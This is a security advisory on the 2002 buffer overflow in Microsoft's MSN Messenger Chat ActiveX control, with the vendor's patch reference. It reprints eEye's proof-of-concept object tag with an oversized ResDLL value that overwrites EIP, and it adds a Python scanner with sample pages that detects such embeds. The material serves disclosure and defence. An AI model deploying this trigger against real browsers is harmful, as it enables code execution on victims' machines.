Reported May 8, 2002, by eEye Digital Security.
VERSION AFFECTED
· Microsoft MSN Messenger ActiveX Chat Control
DESCRIPTION
A buffer overflow condition exists in Microsoft’s MSN Messenger Chat control that can result in unauthorized code execution. Even if users haven't installed Messenger, an attacker can load the control through the codebase attribute of an object tag, which prompts users to install the control under Microsoft's credentials, because Microsoft signs the OLE custom control (OCX). eEye’s advisory gives a detailed explanation of this vulnerability.
DEMONSTRATION
eEye Digital Security provided the following example as proof-of-concept:
<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455"
height="523">
<param name="_cx" value="12039">
<param name="_cy" value="13838">
<param name="BackColor" value="50331647">
<param name="ForeColor" value="43594547">
<param name="RedirectURL" value="">
<param name="ResDLL" value="AAAAAAA[27,257 bytes is where the EIP starts]">
</object>
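For content filtering or log review, a page that embeds this control with an oversized ResDLL parameter, or that supplies a codebase attribute to force its installation, can be flagged with a small HTML scanner. The following is an added example, not code from eEye or from Microsoft; the CLSID and parameter name come from the advisory, while the 256-byte threshold and the sample values are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# CLSID of the MSN Messenger Chat control named in the advisory.
MSN_CHAT_CLSID = "9088e688-063a-4806-a3db-6522712fc061"
# Assumed threshold: a legitimate ResDLL value is a short file name,
# whereas the proof-of-concept used a 27,257-byte string.
MAX_RESDLL_LEN = 256


class ChatControlScanner(HTMLParser):
    """Collects findings for <object> tags that load the MSN Chat control."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._current = None  # attributes/params of the <object> being read

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute names are lowercased
        if tag == "object":
            classid = a.get("classid", "").lower().replace("clsid:", "")
            if classid == MSN_CHAT_CLSID:
                self._current = {"codebase": a.get("codebase"), "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            obj, self._current = self._current, None
            reasons = []
            resdll = obj["params"].get("resdll", "")
            if len(resdll) > MAX_RESDLL_LEN:
                reasons.append(f"ResDLL value is {len(resdll)} bytes")
            if obj["codebase"]:
                reasons.append("codebase attribute would trigger control install")
            if reasons:
                self.findings.append(reasons)


def scan_html(html):
    """Return one list of reasons per suspicious <object> found in the page."""
    p = ChatControlScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed samples: the shape of the advisory's PoC, and a benign embed.
SUSPICIOUS = ('<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061">'
              '<param name="ResDLL" value="' + "A" * 27257 + '"></object>')
BENIGN = ('<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061">'
          '<param name="ResDLL" value="example.dll"></object>')
```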
VENDOR RESPONSE
The vendor, Microsoft, has released Security Bulletin MS02-022 to address this vulnerability and recommends that affected users apply the appropriate patch listed in the bulletin.
CREDIT
Discovered by Drew Copley and eEye Digital Security.